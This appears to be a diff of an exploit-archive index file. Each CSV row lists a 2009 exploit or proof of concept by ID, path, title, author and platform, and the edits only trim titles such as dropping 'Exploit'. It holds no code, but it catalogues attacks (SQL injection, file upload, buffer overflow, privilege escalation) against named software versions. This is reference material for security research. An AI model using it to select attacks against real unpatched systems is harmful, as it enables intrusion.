8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0 -8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 -8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - (upldgallery.php) Remote File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 -8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution Exploit",2009-03-26,Osirys,php,webapps,0 +8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0 +8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - (upldgallery.php) Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 +8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps,0 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 -8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 +8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - ''Username'' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 -8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 +8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution",2009-03-27,Osirys,php,webapps,0 8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0 @@ -7823,20 +7824,20 @@ id,file,description,date,author,platform,type,port 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 -8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (Playlist) Universal SEH Overwrite",2009-03-30,His0k4,windows,local,0 +8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 -8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution Exploit",2009-03-30,Osirys,php,webapps,0 +8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,php,webapps,0 8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0 8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 -8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash Exploit",2009-03-30,"Ahmed Obied",multiple,dos,0 +8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0 8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0 -8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 +8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 8326,platforms/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection (Metasploit)",2009-03-31,waraxe,php,webapps,0 8327,platforms/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 @@ -7862,7 +7863,7 @@ id,file,description,date,author,platform,type,port 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution",2009-04-03,brain[pillow],php,webapps,0 -8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 +8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 @@ -7873,7 +7874,7 @@ id,file,description,date,author,platform,type,port 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos,0 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 -8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload Exploit",2009-04-07,EgiX,php,webapps,0 +8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps,0 8363,platforms/windows/remote/8363.py,"XBMC 8.10 - (HEAD) Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 8365,platforms/php/webapps/8365.txt,"Joomla Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 @@ -7882,12 +7883,12 @@ id,file,description,date,author,platform,type,port 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 - 'exit_notify()' Privilege Escalation",2009-04-08,gat3way,linux,local,0 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",windows,dos,0 -8371,platforms/windows/local/8371.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow Exploit",2009-04-08,AlpHaNiX,windows,local,0 +8371,platforms/windows/local/8371.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow",2009-04-08,AlpHaNiX,windows,local,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 8373,platforms/php/webapps/8373.txt,"Xplode CMS - (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0 -8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - (DB.MDB) Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 +8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0 -8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 +8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0 8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - '.swf' Off-by-One Buffer Overflow (PoC)",2009-04-09,Stack,windows,dos,0 8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 @@ -7909,7 +7910,7 @@ id,file,description,date,author,platform,type,port 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0 8398,platforms/windows/remote/8398.php,"FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0 -8401,platforms/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - (html) Local SEH Overwrite",2009-04-13,dun,windows,local,0 +8401,platforms/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - (html) Local Overwrite (SEH)",2009-04-13,dun,windows,local,0 8402,platforms/windows/dos/8402.pl,"Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8403,platforms/windows/dos/8403.pl,"WM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8404,platforms/windows/dos/8404.pl,"RM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 @@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port 8416,platforms/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 -8419,platforms/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 +8419,platforms/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure",2009-04-13,Stack,windows,remote,21 8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 - '.bps' Buffer Overflow (SEH)",2009-04-13,His0k4,windows,local,0 8421,platforms/windows/remote/8421.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 @@ -7940,7 +7941,7 @@ id,file,description,date,author,platform,type,port 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 -8432,platforms/php/webapps/8432.txt,"Aqua CMS - 'username' SQL Injection",2009-04-14,halkfild,php,webapps,0 +8432,platforms/php/webapps/8432.txt,"Aqua CMS - ''Username'' SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 - (Long URL) Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,windows,dos,0 8435,platforms/php/webapps/8435.txt,"W2B phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 @@ -7952,7 +7953,7 @@ id,file,description,date,author,platform,type,port 8441,platforms/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 -8444,platforms/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat' Universal SEH Overwrite",2009-04-15,dun,windows,local,0 +8444,platforms/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat' Universal Overwrite (SEH)",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)",2009-04-15,e.wiZz!,windows,dos,0 @@ -7991,7 +7992,7 @@ id,file,description,date,author,platform,type,port 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 -8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (File Upload / Information Disclosure) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 +8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 8484,platforms/windows/dos/8484.pl,"1by1 1.67 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 @@ -8006,7 +8007,7 @@ id,file,description,date,author,platform,type,port 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0 -8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 +8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 @@ -8020,20 +8021,20 @@ id,file,description,date,author,platform,type,port 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 -8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 +8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash",2009-04-22,M4rt1n,windows,dos,0 8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0 -8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials - Cross-Site Scripting Exploit",2009-04-22,jdc,php,webapps,0 -8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 +8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0 +8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure",2009-04-22,Stack,windows,remote,0 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Buffer Overflow (1)",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - '.m3u' Buffer Overflow (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 -8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 +8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0 8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow",2009-04-23,Stack,windows,local,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0 @@ -8066,12 +8067,12 @@ id,file,description,date,author,platform,type,port 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,php,webapps,0 -8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure Exploit (C)",2009-04-28,StAkeR,php,webapps,0 +8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote,0 -8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 -8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 +8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure",2009-04-28,Cyber-Zone,windows,remote,0 +8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow",2009-04-29,Nine:Situations:Group,windows,remote,0 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 -8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 +8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure",2009-04-29,ZoRLu,windows,remote,0 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 @@ -8080,53 +8081,53 @@ id,file,description,date,author,platform,type,port 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2)",2009-04-30,"Jon Oberheide",linux,local,0 -8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 +8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash",2009-04-30,"Aditya K Sood",windows,dos,0 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0 8577,platforms/php/webapps/8577.txt,"leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)",2009-04-30,SirGod,windows,dos,0 -8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow Exploit",2009-04-30,MITBOY,windows,remote,0 +8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote,0 8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow",2009-04-30,His0k4,windows,local,0 8581,platforms/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos,0 -8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' SEH Overwrite",2009-04-30,His0k4,windows,local,0 -8583,platforms/windows/local/8583.py,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow Exploit",2009-05-01,His0k4,windows,local,0 +8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' Overwrite (SEH)",2009-04-30,His0k4,windows,local,0 +8583,platforms/windows/local/8583.py,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow",2009-05-01,His0k4,windows,local,0 8584,platforms/hardware/dos/8584.py,"Addonics NAS Adapter FTP - Remote Denial of Service",2009-05-01,h00die,hardware,dos,0 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)",2009-05-01,SirGod,windows,dos,0 8589,platforms/windows/local/8589.py,"RM Downloader - '.smi' Local Stack Overflow",2009-05-01,"ThE g0bL!N",windows,local,0 -8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - '.m3u' Local SEH Overwrite",2009-05-01,His0k4,windows,local,0 +8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)",2009-05-01,His0k4,windows,local,0 8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)",2009-05-01,"Encrypt3d.M!nd ",windows,local,0 8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)",2009-05-01,Stack,windows,local,0 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8594,platforms/windows/local/8594.pl,"RM Downloader - '.smi' Universal Local Buffer Overflow",2009-05-01,Stack,windows,local,0 -8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 -8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 +8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption",2009-05-04,Abysssec,windows,local,0 